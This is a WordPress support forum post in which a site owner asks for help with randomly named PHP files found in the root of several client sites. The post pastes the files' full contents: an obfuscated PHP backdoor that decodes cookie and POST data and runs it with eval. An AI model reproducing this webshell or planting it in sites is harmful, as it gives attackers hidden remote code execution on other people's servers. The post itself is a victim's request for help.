dktlpum in radom named php files
-
Hi,
This morning i got mails from wordfence on all random client sites.
they are always 1 file in the root directory next to wp-content wp-admin folders with a random name in those files there is always the same code:<?php $dktlpum = '-acn_6k4vebugy#\'i2mx98*lp5H0sto1frd';$ziwqkq = Array();$ziwqkq[] = $dktlpum[32].$dktlpum[7].$dktlpum[31].$dktlpum[17].$dktlpum[25].$dktlpum[21].$dktlpum[7].$dktlpum[9].$dktlpum[0].$dktlpum[2].$dktlpum[9].$dktlpum[27].$dktlpum[5].$dktlpum[0].$dktlpum[7].$dktlpum[5].$dktlpum[10].$dktlpum[7].$dktlpum[0].$dktlpum[10].$dktlpum[31].$dktlpum[32].$dktlpum[10].$dktlpum[0].$dktlpum[1].$dktlpum[34].$dktlpum[21].$dktlpum[2].$dktlpum[31].$dktlpum[9].$dktlpum[25].$dktlpum[20].$dktlpum[17].$dktlpum[25].$dktlpum[7].$dktlpum[9];$ziwqkq[] = $dktlpum[26].$dktlpum[22];$ziwqkq[] = $dktlpum[14];$ziwqkq[] = $dktlpum[2].$dktlpum[30].$dktlpum[11].$dktlpum[3].$dktlpum[29];$ziwqkq[] = $dktlpum[28].$dktlpum[29].$dktlpum[33].$dktlpum[4].$dktlpum[33].$dktlpum[9].$dktlpum[24].$dktlpum[9].$dktlpum[1].$dktlpum[29];$ziwqkq[] = $dktlpum[9].$dktlpum[19].$dktlpum[24].$dktlpum[23].$dktlpum[30].$dktlpum[34].$dktlpum[9];$ziwqkq[] = $dktlpum[28].$dktlpum[11].$dktlpum[10].$dktlpum[28].$dktlpum[29].$dktlpum[33];$ziwqkq[] = $dktlpum[1].$dktlpum[33].$dktlpum[33].$dktlpum[1].$dktlpum[13].$dktlpum[4].$dktlpum[18].$dktlpum[9].$dktlpum[33].$dktlpum[12].$dktlpum[9];$ziwqkq[] = $dktlpum[28].$dktlpum[29].$dktlpum[33].$dktlpum[23].$dktlpum[9].$dktlpum[3];$ziwqkq[] = $dktlpum[24].$dktlpum[1].$dktlpum[2].$dktlpum[6];foreach ($ziwqkq[7]($_COOKIE, $_POST) as $hmhqai => $qytazij){function ewsseq($ziwqkq, $hmhqai, $yvrmg){return $ziwqkq[6]($ziwqkq[4]($hmhqai . $ziwqkq[0], ($yvrmg / $ziwqkq[8]($hmhqai)) + 1), 0, $yvrmg);}function nzeynw($ziwqkq, $zclzhc){return @$ziwqkq[9]($ziwqkq[1], $zclzhc);}function shkbbo($ziwqkq, $zclzhc){$ocggwz = $ziwqkq[3]($zclzhc) % 3;if (!$ocggwz) {eval($zclzhc[1]($zclzhc[2]));exit();}}$qytazij = nzeynw($ziwqkq, $qytazij);shkbbo($ziwqkq, $ziwqkq[5]($ziwqkq[2], $qytazij ^ ewsseq($ziwqkq, $hmhqai, $ziwqkq[8]($qytazij))));}Any idea what this is?
How did they get this file there?
What should i do?
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘dktlpum in radom named php files’ is closed to new replies.
